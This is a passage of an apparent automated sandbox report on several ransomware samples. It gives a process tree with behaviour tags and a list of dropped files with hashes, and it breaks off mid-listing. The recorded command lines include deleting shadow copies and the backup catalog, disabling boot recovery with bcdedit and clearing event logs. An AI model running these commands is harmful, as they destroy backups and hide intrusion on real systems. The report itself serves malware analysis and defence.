        • Adds Run key to start application
        • Drops file in Windows directory
        • Suspicious use of AdjustPrivilegeToken
        PID:2204
        • C:\Windows\system32\runonce.exe
          "C:\Windows\system32\runonce.exe" -r
          4⤵
          • Checks processor information in registry
          PID:2372
      • C:\Users\Admin\AppData\Local\Temp\gonbqig.exe
        C:\Users\Admin\AppData\Local\Temp\gonbqig.exe /HomeRegAccess10
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:2660
      • C:\Users\Admin\AppData\Local\Temp\puashkr.exe
        C:\Users\Admin\AppData\Local\Temp\puashkr.exe /HomeRegAccess10
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:1788
      • C:\Windows\system32\Rundll32.exe
        Rundll32.exe setupapi,InstallHinfSection DefaultInstall 132 C:\Users\Admin\AppData\Local\Temp\~chtpbqp.inf
        3⤵
        • Adds Run key to start application
        • Drops file in Windows directory
        • Suspicious use of AdjustPrivilegeToken
        PID:2368
        • C:\Windows\system32\runonce.exe
          "C:\Windows\system32\runonce.exe" -r
          4⤵
          • Checks processor information in registry
          PID:2276
      • C:\Windows\system32\cmd.exe
        cmd /c C:\Users\Admin\AppData\Local\Temp\pLhO8GB.bat
        3⤵
          PID:1520
        • C:\Windows\system32\cmd.exe
          cmd /c C:\Users\Admin\AppData\Local\Temp\iLSpLtV.bat
          3⤵
            PID:2292
        • C:\Users\Admin\Desktop\00351\Trojan-Ransom.Win32.Blocker.llqn-8d28758e41d57749658cffafebc887020b4e7db4be19e26d6957afb468a8c217.exe
          Trojan-Ransom.Win32.Blocker.llqn-8d28758e41d57749658cffafebc887020b4e7db4be19e26d6957afb468a8c217.exe
          2⤵
          • Modifies WinLogon for persistence
          • Modifies visibility of file extensions in Explorer
          • Modifies visibility of hidden/system files in Explorer
          • Disables RegEdit via registry modification
          • Disables cmd.exe use via registry modification
          • Executes dropped EXE
          • Modifies system executable filetype association
          • Modifies WinLogon
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: CmdExeWriteProcessMemorySpam
          • Suspicious use of SendNotifyMessage
          • Suspicious use of WriteProcessMemory
          • System policy modification
          PID:2392
          • C:\Windows\explorer.exe
            C:\Windows/explorer.exe
            3⤵
              PID:2788
            • C:\Windows\SysWOW64\taskmgr.exe
              C:\Windows/system32/taskmgr.exe
              3⤵
              • System Location Discovery: System Language Discovery
              PID:352
          • C:\Users\Admin\Desktop\00351\Trojan-Ransom.Win32.Gen.hjl-a58b5f2e8172be31e3d1fcc046d044bd862393f3d3e12922287bedf6f8c18e39.exe
            Trojan-Ransom.Win32.Gen.hjl-a58b5f2e8172be31e3d1fcc046d044bd862393f3d3e12922287bedf6f8c18e39.exe
            2⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: CmdExeWriteProcessMemorySpam
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3024
            • C:\Users\Admin\AppData\Local\Temp\teiod.exe
              123 \\.\pipe\E86A104A-9366-4921-856A-6C2B3065C184
              3⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:668
            • C:\Users\Admin\AppData\Local\Temp\teikv.exe
              123 \\.\pipe\0E8EBAA4-E8E1-4A42-8075-A1DAE7FA26EF
              3⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1972
            • C:\Users\Admin\AppData\Local\Temp\_abp.exe
              "C:\Users\Admin\AppData\Local\Temp\_abp.exe"
              3⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              PID:1916
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
                4⤵
                  PID:2276
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c wbadmin.exe delete catalog -quiet
                  4⤵
                    PID:1776
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
                    4⤵
                      PID:1280
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c wevtutil.exe cl System
                      4⤵
                        PID:2116
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c wevtutil.exe cl Security
                        4⤵
                          PID:1516
                      • C:\Windows\SysWOW64\notepad.exe
                        "C:\Windows\system32\notepad.exe"
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:2224
                    • C:\Users\Admin\Desktop\00351\Trojan-Ransom.Win32.Purgen.fk-713b99b925c3cb7357e956e98b25009cdd1aed782f88254d05806a7126935e22.exe
                      Trojan-Ransom.Win32.Purgen.fk-713b99b925c3cb7357e956e98b25009cdd1aed782f88254d05806a7126935e22.exe
                      2⤵
                      • Executes dropped EXE
                      • Adds Run key to start application
                      • Drops desktop.ini file(s)
                      • Drops file in Program Files directory
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of WriteProcessMemory
                      PID:2152
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c C:\Users\Admin\AppData\Local\Temp\__t7427.tmp.bat
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:1696
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c C:\Users\Admin\AppData\Local\Temp\__t1E2C.tmp.bat
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:1356
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd /c C:\Users\Admin\AppData\Local\Temp\tmp1E3C.tmp.bat
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:2468
                    • C:\Users\Admin\Desktop\00351\Trojan-Ransom.Win32.SageCrypt.ddn-b51c98cfb7eedc1899ef80a8f8245e46df66d5fb48f4f7198d46295d3d49c22c.exe
                      Trojan-Ransom.Win32.SageCrypt.ddn-b51c98cfb7eedc1899ef80a8f8245e46df66d5fb48f4f7198d46295d3d49c22c.exe
                      2⤵
                      • Executes dropped EXE
                      • Loads dropped DLL
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                      • Suspicious use of SendNotifyMessage
                      • Suspicious use of WriteProcessMemory
                      PID:2976
                      • C:\Users\Admin\Desktop\00351\Trojan-Ransom.Win32.SageCrypt.ddn-b51c98cfb7eedc1899ef80a8f8245e46df66d5fb48f4f7198d46295d3d49c22c.exe
                        "C:\Users\Admin\Desktop\00351\Trojan-Ransom.Win32.SageCrypt.ddn-b51c98cfb7eedc1899ef80a8f8245e46df66d5fb48f4f7198d46295d3d49c22c.exe" g
                        3⤵
                        • Executes dropped EXE
                        • System Location Discovery: System Language Discovery
                        PID:1324
                      • C:\Windows\SysWOW64\shell.exe
                        "C:\Windows\system32\shell.exe" "C:\Windows\System32\schtasks.exe" /CREATE /TN "N0mFUQoa" /TR "C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe" /SC ONLOGON /RL HIGHEST /F
                        3⤵
                        • Executes dropped EXE
                        • System Location Discovery: System Language Discovery
                        • Suspicious use of SetWindowsHookEx
                        PID:592
                      • C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe
                        "C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe"
                        3⤵
                        • Executes dropped EXE
                        • Loads dropped DLL
                        • Enumerates connected drives
                        • Sets desktop wallpaper using registry
                        • System Location Discovery: System Language Discovery
                        • Modifies Control Panel
                        • Modifies data under HKEY_USERS
                        • Modifies registry class
                        PID:2416
                        • C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe
                          "C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe" g
                          4⤵
                          • Executes dropped EXE
                          • System Location Discovery: System Language Discovery
                          PID:1756
                        • C:\Windows\SysWOW64\vssadmin.exe
                          "C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet
                          4⤵
                          • System Location Discovery: System Language Discovery
                          • Interacts with shadow copies
                          PID:3068
                        • C:\Windows\SysWOW64\vssadmin.exe
                          "C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet
                          4⤵
                          • System Location Discovery: System Language Discovery
                          • Interacts with shadow copies
                          PID:592
                        • C:\Windows\SysWOW64\vssadmin.exe
                          "C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet
                          4⤵
                          • System Location Discovery: System Language Discovery
                          • Interacts with shadow copies
                          PID:1616
                        • C:\Windows\SysWOW64\mshta.exe
                          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\!HELP_SOS.hta"
                          4⤵
                          • System Location Discovery: System Language Discovery
                          • Modifies Internet Explorer settings
                          PID:1452
                        • C:\Windows\SysWOW64\WScript.exe
                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f1.vbs"
                          4⤵
                          • System Location Discovery: System Language Discovery
                          PID:1540
                        • C:\Windows\SysWOW64\schtasks.exe
                          "C:\Windows\System32\schtasks.exe" /DELETE /TN /F "N0mFUQoa"
                          4⤵
                          • System Location Discovery: System Language Discovery
                          PID:2112
                        • C:\Windows\SysWOW64\WScript.exe
                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f16184093.vbs"
                          4⤵
                          • System Location Discovery: System Language Discovery
                          PID:2580
                      • C:\Windows\SysWOW64\WScript.exe
                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f252888.vbs"
                        3⤵
                        • System Location Discovery: System Language Discovery
                        PID:2028
                    • C:\Users\Admin\Desktop\00351\Trojan-Ransom.Win32.Shade.pho-414bb1af4fbb618c4889d69144c7f66591c6e5294d0ab3b7ea8b774946977cf2.exe
                      Trojan-Ransom.Win32.Shade.pho-414bb1af4fbb618c4889d69144c7f66591c6e5294d0ab3b7ea8b774946977cf2.exe
                      2⤵
                      • Executes dropped EXE
                      • Adds Run key to start application
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: CmdExeWriteProcessMemorySpam
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of UnmapMainImage
                      PID:1848
                  • C:\Windows\SysWOW64\DllHost.exe
                    C:\Windows\SysWOW64\DllHost.exe /Processid:{3F6B5E16-092A-41ED-930B-0B4125D91D4E}
                    1⤵
                    • System Location Discovery: System Language Discovery
                    PID:1192
                  • C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE
                    "C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE" -Embedding
                    1⤵
                    • Drops file in System32 directory
                    • Drops file in Windows directory
                    • System Location Discovery: System Language Discovery
                    • Modifies registry class
                    • Suspicious behavior: AddClipboardFormatListener
                    • Suspicious use of SetWindowsHookEx
                    PID:1692

                  Network

                  MITRE ATT&CK Enterprise v15


                  Downloads

                  • C:\PerfLogs\Admin\KWNLVP-DECRYPT.txt

                    Filesize

                    8KB

                    MD5

                    19e999a5a8ebf5fa012bbd555017f37a

                    SHA1

                    586e8650b4a3250e75cebeae332fea3af4489d76

                    SHA256

                    1d2cc5f00db6837e086d394762d6a1ea345856a6f84e168e383a90fbfa518bea

                    SHA512

                    d7ea9c6eb985d63a33c2a92dd1b406ebbfc9de142fab3ef2d2353a57ebd4acc371d9c66ab4903eb65b90ae16ce20cf960983b088ee322cca7e5dba0df1f6a4ab

                  • C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt

                    Filesize

                    27KB

                    MD5

                    045e4a7ba3ac20222576eb2b08dbcbab

                    SHA1

                    00ef15925fea3dae1efe2f3a04a837a2a42bf895

                    SHA256

                    c2cfb1faef8c03bfc854a63b0650cf55b467b0d69e015817c1c4a5cdcd573baf

                    SHA512

                    c7c608fe9d871fa68f6d8e3f02b31f93eafc4bf809a3606a0219d416a67b0555ba00fbb0b733e5eaac7f3bf464edf0514744bab4cc6a17a68d45c82c35edee37

                  • C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SoftBlue\background.gif

                    Filesize

                    6KB

                    MD5

                    b2e86b1d107d1bbad0422b73f34d6e90

                    SHA1

                    dd19b1a242ef62c184b09beb25aae38228164d89

                    SHA256

                    90eb00f28550c381219a5b81405937dba56c4d6ad54b7ac19bf7f3c877f869c8

                    SHA512

                    e22e40d1637d6f4a458ad088f0528a1f3b1aa7571a6c2ff49b5c6eaea6901b511c839d48edf571592d92771975c5d6d25e1658abba2dfa0788196d867281cb09

                  • C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Swirl\HEADER.GIF

                    Filesize

                    26KB

                    MD5

                    9f3a244103af4873bd2546a501510ef5

                    SHA1

                    b192805f674152fcf542b9768682e54f14fd9694

                    SHA256

                    dc06c38b376b0fc4ff363e145dacb8c6e6d0233149cb8762a146a11db13bb7df

                    SHA512

                    b38950913e221a1776d51d03d3fea237ada29ece723a0cb9745543678ed4c91d03e645bd610630eece9f35d47aa1325eb931f15f6b8f6f3b01815c06d1c0fd3e

                  • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\BG_ADOBE.GIF

                    Filesize

                    24KB

                    MD5

                    b6e6024843f843fa0eeadb960c7568ee

                    SHA1

                    72ad4e61ada3a77d8a3e9c51d1346d0098925abb

                    SHA256

                    91d16bee1a923bd48de87eea5c7022552ae69dc7e2d2d15f0f7010310c50f46c

                    SHA512

                    c0c71f0be5468f8fd89d0799693fa5fd80ff3d4e422c15b22910eff3e98a7e11c9d72183d0bc1eeb29b1dff1e26b2834918e789e9ac99c9706537693fd00fc0c

                  • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormToolImages.jpg

                    Filesize

                    7KB

                    MD5

                    34aaea3aff49eb1caa83392e02060af1

                    SHA1

                    5252823cf0b5d96c5767aaaccaa2630607ee170d

                    SHA256

                    f683ede42f9a86f3bc95a073f5e079e675c8d858f127373ab1bebdf1b2b152d6

                    SHA512

                    bf483cd4e2d2fc297427740126ddbdef9f5c5c6231cb088fe8e548f51ad5daa52dbbb2486926c9ee6eaa52319decbaee054e80a67acf25f8024a02cf47329a84

                  • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsViewAttachmentIcons.jpg

                    Filesize

                    5KB

                    MD5

                    45da053d69e7cc99f17bee9a4978f645

                    SHA1

                    7c4e74ce599fadaa77a54c02ea81a69f4b07a497

                    SHA256

                    2b087965af44c65b9894fb09b637e8ff438924c2c8a26657f7e006e64105ab89

                    SHA512

                    9bfd5d45e09ebad6e2e14fd05c2406b3c58588ae1c79d5ee793d1bdf27a1bb169b223d76f0bcba7e0983426a26d9a4c3a936dd325491e9acaf31a7cc547db086

                  • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_Casual.gif

                    Filesize

                    5KB

                    MD5

                    a357856e93f748b59bd69710e5a26c3a

                    SHA1

                    629fab605dd8ee36c58794e6007fcc13256f8a2c

                    SHA256

                    04ff4facc4b1d1a7448c0e7ce77b46ee8dd789a3c73c321b2a61f1b16837bdc9

                    SHA512

                    e544b5ce237ae88b6287b64edbf07fb9d96c38ae69f9f235d0b38f74144468906a43ca106180e2ec907b38ce221b0a38a8b68c90a35261fc2fbf192bf3423b1e

                  • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_Country.gif

                    Filesize

                    31KB

                    MD5

                    d67fe5c2287ebcfd2f493dfb81f3415d

                    SHA1

                    ad77d68079c186993fd6a7080ef07744e50a6e75

                    SHA256

                    d6d25daae18f5d9ae2108b622e5609a2fbe3d0c494fc1e620e98a2b6c2695c9f

                    SHA512

                    fbe53e9443c22bc1b4656014bc95bc117f8d133610a31ff6e130f3d6be3012a2e024d44c64e3e90583b26e288be0773e1fcb7dbe5328674c3a36b7a8b41221e4

                  • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_Earthy.gif

                    Filesize

                    4KB

                    MD5

                    4abeb2bfd1babab9f1ccbd7669b26a51

                    SHA1

                    e1692a7af981d3d4cbe18793afba8488f5878e0e

                    SHA256

                    8593a71c727d065a091ccf50f6e12d8e3422bd8482c987d55c69f965f47704b5

                    SHA512

                    e4386e114e6c06cfc6a5cd87e74eab49daf05c2ccb3ff8e67c88b74c1d032fd0d2f16a017aefa93400361e86733680e707b74064723bf0fdf9d7780797b604ab

                  • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_FormsHomePageBlank.gif

                    Filesize

                    19KB

                    MD5

                    80dd35cdaf8d5288afe750a7c81cab95

                    SHA1

                    6aa4c2f4725f6529e2e94491701e35f507999683

                    SHA256

                    a10ca1f6a4638c86599614f78796f0d19daaf6c0d067818f4380fc7e9bc3fbc3

                    SHA512

                    5368ba868ec371f794f6506b114ed6fd52695042d5f8dce6b68148307eadc536fac3eed8e022c6dd3a610a9ee51d38339d798d9a1ab201222a0bc932db30d1a2

                  • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_GreenTea.gif

                    Filesize

                    21KB

                    MD5

                    306409d4c2502cb7daf296094f248019

                    SHA1

                    5f7bf343cbb4be7ae25ef4430838f893271ec62d

                    SHA256

                    a7b5aaf02f83431c932813e13b632411949c1cb1b43855da48041faa721ceedd

                    SHA512

                    23c1e02c574bc0c3104555637793fdddc83996ba90f2013bf419e67598c6109330befbfb860ce9443bc1949c1d793e444d73eb48e8ccf8fe1b64a0b1548358d2

                  • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_LightSpirit.gif

                    Filesize

                    8KB

                    MD5

                    8f334c5edadd299b8f668928585dbdf4

                    SHA1

                    79c72e8f2494afffe0c019c540aeed72693c2733

                    SHA256

                    2c5d6c044aa3971edfaea58cdb11d1ad97424846b5078a3a3b659472ec012988

                    SHA512

                    8452b64545f451116c9bdd1cb8841df8eadfc078ea185a6f8d476aefbe68b878f6abe91e33fff16271eee3a5ffa42b35bf62542952ff2d34060fe6243e1eb092

                  • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_OliveGreen.gif

                    Filesize

                    15KB

                    MD5

                    a04c9e5f50f03edb59a997efa3a3d7ee

                    SHA1

                    3db5fafafb70b0093b46bdb5479ec999a57e85bd

                    SHA256

                    aa8bb5c389e95131b7a8f7a3583d5abcec3872ce23cf9ccb169457c690746086

                    SHA512

                    97c8b6c7421aa4271e151682531e2312e146aab81aab5fae5215b6a67c320e14cf4c20e41d29b4301eaa314a4fbc7ab526d6a92abf8138e5bce3797a9190cf7f

                  • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_Premium.gif

                    Filesize

                    6KB

                    MD5

                    950f66bfa8a8620e46ef7dbe035a2760

                    SHA1

                    8ca2584eb8baa9ef0c76509037680b981bc5e65e

                    SHA256

                    f736714bd1817ec67cc3673c905e484a6b05a2f45da6f6995b0bc620c4b813ac

                    SHA512

                    a1cf1e9f06423db54c66384ec3d185148eede3eea43a4d7eedd3db0b039cf9412670436a7b55cc619fbb726c2eb087d1cdaae66d7c428cbf529d265e2baec08e

                  • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_SlateBlue.gif

                    Filesize

                    20KB

                    MD5

                    6e98393a66e758c7c60e9cdc8e107a9d

                    SHA1

                    4f531b327d9b95b8ad69f1d904066c9312ad3bdb

                    SHA256

                    d03a74778f24be3392ecad9d327baf74d345be07870208ba1a0915bd7a191387

                    SHA512

                    27f4fbb68b6a01587906bd5a296d39fe99fb3631984a33bfad399b3818659fc88ca1747bddb88e4d031bcab71f92f3b5d45e464dd33d0365413160939c1f91ae

                  • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_TexturedBlue.gif

                    Filesize

                    6KB

                    MD5

                    28bd5f44f00db6f4f7f3ab6d611bf218

                    SHA1

                    8e9e9dbc19569e7130ab99b66edf7cff5d81c007

                    SHA256

                    195caa8a45a2508604dcb691f8a44e16995c844b5fe17ab7a6952a386a59c4e1

                    SHA512

                    8e34afca638f67818cec3d78043ae3bed5dba66e71908d78e6dcd54b605b61f15f2c486f770b5f7d801d53e3079d2a257f496181b9306e2c541ea6e8a45e000e

                  • C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_VelvetRose.gif

                    Filesize

                    15KB

                    MD5

                    1d3578e44821bd6622f2384d27a96a89

                    SHA1

                    25e164801f77ddb707560184c4fc876897c4488f

                    SHA256

                    eeec4c224076224180a692af4c21247e776a5c2f6ca2fa332a3fdac81b21d044

                    SHA512

                    3d2e2a0e06bb597c75956a5e4e8c919f45b0133a626cedb64ec88eb53884b053f7473104fa2965d220bfd68b870b359f26086377dcf8569ddf05620dc7286bc3

                  • C:\Program Files (x86)\Microsoft Office\Office14\InfoPathOM\InfoPathOMFormServices\Microsoft.Office.InfoPath.xml

                    Filesize

                    247KB

                    MD5

                    dc400b7cee75f5c8fd9561a732d474d3

                    SHA1

                    db7063448759c5cdd1371a870b4149bbac2fc2f5

                    SHA256

                    2e65dc65c85097ba4d562dfedbdb967358d6ff5b5d503069c5f21ed080e9968d

                    SHA512

                    692d21e16b99c935401dfc781d3a4f8e6aa325b968862eb2231c35e62267f6d33306be4843d99a9870db336c4d53a3b18415241c00a5f51c0475b03ebe674940

                  • C:\Program Files\Java\jdk1.7.0_80\jre\THIRDPARTYLICENSEREADME-JAVAFX.txt

                    Filesize

                    109KB

                    MD5

                    bb13b30c0a78449be80c4f6131bf6568

                    SHA1

                    cdd1aee1e708de337281e8dee387e2cee243cad5

                    SHA256

                    c99abe82ca5c0d3ec12bb736dd630885d289705cb3c2cc0c6d2b95390ea897b1

                    SHA512

                    aaf8d9eafb62d5950b7879f96822e0445e466c05e3115e0550cf2740083f48c11850c3919ff98a7db4f6df2571cac796114de90683667de2c35b36817b6cde8d

                  • C:\Program Files\Java\jdk1.7.0_80\jre\THIRDPARTYLICENSEREADME.txt

                    Filesize

                    173KB

                    MD5

                    7c89ba7772aeb40dfc3e3b232de653b3

                    SHA1

                    b602b4004ca940089277122fc333d6ff71cbfef5

                    SHA256

                    a46234178c1a446eb5f6e94152e8867703a83f9c08e1d7463dd77f847a0943d5

                    SHA512

                    cf84ed9f4d33fbae8ddd071b8b13bed62fe0189990deb56c2207f79c4c7d4dbb21cb8efc254c8dea4bd07e3736b28d31dc6be479bcee5796c0d5e69ec46010c4

                  • C:\Program Files\Java\jdk1.7.0_80\jre\bin\msvcr100.dll

                    Filesize

                    810KB

                    MD5

                    885ce1d422a09f5d1b4aedf8a9a75a92

                    SHA1

                    e5ac638811376792871bc2d6602827154d3b146b

                    SHA256

                    08fee4a2494f60cfbeb69875a65d734c34379b371cc8f0d4487368585d08f5be

                    SHA512

                    650eb07aa8a57150f1f5293e9c3001edfaf882dba06d9e89b63e6bea64630e57a9a6e03624f0636bef4f86e91d47bcb1d2d65ec5c0dffa2f6064641217a955fa

                  • C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\ECLIPSE_.RSA

                    Filesize

                    7KB

                    MD5

                    f23292d63b2de82817ae866a2b958142

                    SHA1

                    c347c2bcec493c2fa4f6e2900a4c7dc0392416c7

                    SHA256

                    36fa262ce0ce9e297e0e6f15c87c9009b3d45a71b92cac5b562f006d0d254c1c

                    SHA512

                    093ab5702a1e3a784c9d32fd81827bdf4a5443afd9660909921305c958092ff0136dd6ea9c8658eeecf23d56443e5416b8ee62cdd1066ee3488a3107c208de41

                  • C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\asl-v20.txt

                    Filesize

                    11KB

                    MD5

                    4db013ee2fd002b2e410e89fad043383

                    SHA1

                    23b95ab96c5d01121e1bd34de9bbcc22137577c5

                    SHA256

                    98e87b32d95611a6a26ffce18e9779ffc5df136df960fdc14b560743750e0df2

                    SHA512

                    51ed224975aa96e8cd0fc09a0a83a36a7fe48b29eb3e7e866424223a8ac868021460f27eac0caddf892841d924f5a292a495c67e91baee5a3f59af0907664c93

                  • C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\ECLIPSE_.RSA

                    Filesize

                    7KB

                    MD5

                    d93b8b4d17a5597e7d5b407477e0faa9

                    SHA1

                    41769f4483c3c8014a83f55a54ae234b49969773

                    SHA256

                    6062fcf0fe2c30fbe6e4b080453d52a19be1de580d8007ac33d2e355cadd6fc9

                    SHA512

                    52955d8e1c02a3afbb18394d4c05da5b301335db57f77754ed855ee5aef15131c939add1c9e436e216b5b24baeedd7983cb73981f03718dd0a95f6af3b52a562

                  • C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\epl-v10.html

                    Filesize

                    12KB

                    MD5

                    7fbaf56b7a668c7e9d2d6f2ebfbe6556

                    SHA1

                    3bd1d0d7c039c76534cacf2569c051966fbacc09

                    SHA256

                    d953d7d98bb5c57caef944cc4f03e147a98fd50ff27f68a0873fd6ecc7e27009

                    SHA512

                    9538bbca02cb705b1609f3a0fda0e48ed13905608a7d5b8bed7f7f02bb3b936b386b376a2ffa87f44577c7be5e17c2f514780e43aac01a6cba22d30cdf730e4a

                  • C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\license.html

                    Filesize

                    8KB

                    MD5

                    9b0e98050719a89de81f366bb55697ab

                    SHA1

                    09e2eeb263ffa097e1fa413eac1f5326a9562f82

                    SHA256

                    e295099f54098b4ea8e3e75ff9009ddbddc68889e02c79104ee656b1f9e0f10b

                    SHA512

                    78f0954413c36ec8d0875c63aea30741d6cf53c3eaf76c81efc9d931dc1de241dc08a8d20a69684fb1a30412dfe24e50b29f648ee475dcc364a05985764ac10a

                  • C:\ProgramData\Package Cache\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}v11.0.61030\packages\vcRuntimeMinimum_amd64\vc_runtimeMinimum_x64.msi

                    Filesize

                    148KB

                    MD5

                    205c1530c5dae9b448b8c8c7a17efaca

                    SHA1

                    d6418901428a0703f7503d96bede66d84de65846

                    SHA256

                    7f3f63f413b9fc1d42913442de4fe0f2c37225ed65df0e8df87f376ca87df591

                    SHA512

                    c86624fcf2970328a8b0a897d62edf69090b8fdbe5d20a2c7d448597a838c1cb82fd4165a2efc1d8aea28f6bc28be273dc096f59262e0f65cdfb57dc532b16a1

                  • C:\Users\Admin\AppData\Local\Microsoft\FORMS\FRMCACHE.DAT

                    Filesize

                    120KB

                    MD5

                    fb73795f4e9b22f4d95ff48479ab70cb

                    SHA1

                    9ca3680a2c45060e46f2920a21393ea9ec2f84fd

                    SHA256

                    acdfdc552039fa4b0c9db53b671c5645ed201f9f97bb3b2adb30bf6639379126

                    SHA512

                    82546aeefe83e224ec0bb407a31cfa02a970e2dc194efe2b65c7a8bc2ee119c31f84e4b58d35b5905d451adce0ceb36a7da4390135b5c0de6766554f33d3e40f

                  • C:\Users\Admin\AppData\Local\Microsoft\FORMS\FRMCACHE.DAT

                    Filesize

                    240KB

                    MD5

                    aa41ebdb2f246d6b6a7561928dc0f8d2

                    SHA1

                    6a99c8461d339ecc450a703b5ca2ab9f394453f2

                    SHA256

                    cfc58e3ac4189ea60a3cdce2ef125d99e179687d12dd6dbd81e293fef10d5536

                    SHA512

                    d436e46384a9478400d326f03c21b2bb7cf76fd837103ecb3d45dae5105560a333b4d3ea8577ce8e14871bed98c123e95572ffeb04e77479a63c2ba2aee025d6

                  • C:\Users\Admin\AppData\Local\Microsoft\Outlook\mapisvc.inf

                    Filesize

                    1KB

                    MD5

                    48dd6cae43ce26b992c35799fcd76898

                    SHA1

                    8e600544df0250da7d634599ce6ee50da11c0355

                    SHA256

                    7bfe1f3691e2b4fb4d61fbf5e9f7782fbe49da1342dbd32201c2cc8e540dbd1a

                    SHA512

                    c1b9322c900f5be0ad166ddcfec9146918fb2589a17607d61490fd816602123f3af310a3e6d98a37d16000d4acbbcd599236f03c3c7f9376aeba7a489b329f31

                  • C:\Users\Admin\AppData\Local\Temp\2796kqsgvsu

                    Filesize

                    221KB

                    MD5

                    6458a93628a22a308c61d8aafa260922

                    SHA1

                    b10cc706b7063809b876d9000bb35e34aa83f3b8

                    SHA256

                    0a9a6dcd92ea82a9b6a5c4338676c24ffded15636c8427ba673a702954494fb9

                    SHA512

                    bddac4b723e4a28f79b67c13646187dee9bc64f035508d48bc086c1ef6a36bd8e6342482eb62be6bc6e507307ca77dc0c7060975548ab6aaeaa3cbfd0a7205d4

                  • C:\Users\Admin\AppData\Local\Temp\CabF23D.tmp

                    Filesize

                    70KB

                    MD5

                    49aebf8cbd62d92ac215b2923fb1b9f5

                    SHA1

                    1723be06719828dda65ad804298d0431f6aff976

                    SHA256

                    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

                    SHA512

